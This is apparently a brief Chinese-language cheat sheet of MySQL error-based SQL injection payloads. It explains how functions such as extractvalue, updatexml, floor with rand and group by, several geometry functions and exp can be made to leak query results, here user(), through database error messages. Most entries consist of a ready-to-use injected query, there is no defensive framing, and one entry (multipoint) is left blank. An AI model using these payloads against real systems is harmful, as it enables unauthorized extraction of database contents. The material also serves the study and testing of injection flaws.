报错注入、
报错函数(举例)
(1)extractvalue(参数1,参数2)
从目标XML中返回查询的字符串,参数1 是string格式,XML文档名,参数2是XPAH格式,要查询的字符串
1 | select * from jdy_admin where id = 1 and (extractvalue(1, concat(0x5c,(select user())))); |
(2)updataxml(参数1,参数2,参数3)
改变文档中符合条件的节点的值,参数1是XML文档 , 参数2是xpath的字符串,参数3是string格式替换查找符合条件的数据
1 | select * from jdy_admin where id = 1 and (updatexml(0x3a,concat(1,(select user())),1)); |
(3)floor函数,必须和count()rand() group by 配合才能报错
1 | select \* from news where tid=1 and (select 1 from (select count(\*),concat(user(),floor(rand(0)\*2))x from information_schema.tables group by x)a) |
报错函数
(1)geometrycollection()
1 | select \* from jay_admin where tid=1 and geometrycollection((select \* from (select \* from (select user())a)b)); |
(2)multipoint()函数
1 |
(3)polygon()函数
select * from jay_admin where id=1 and polygon((select * from(select * from(select user())a)b));
(4)multipolygon()函数
select * from jay_admin where id=1 and multipolygon((select * from(select * from(select user())a)b));
(5)linestring()函数
select * from jay_admin where id=1 and linestring((select * from(select * from(select user())a)b));
(6)multilinestring()函数
select * from jay_admin where id=1 and multilinestring((select * from(select * from(select user())a)b));
(7)exp()函数
select * from jay_admin where id=1 and exp(~(select * from(select user())a));
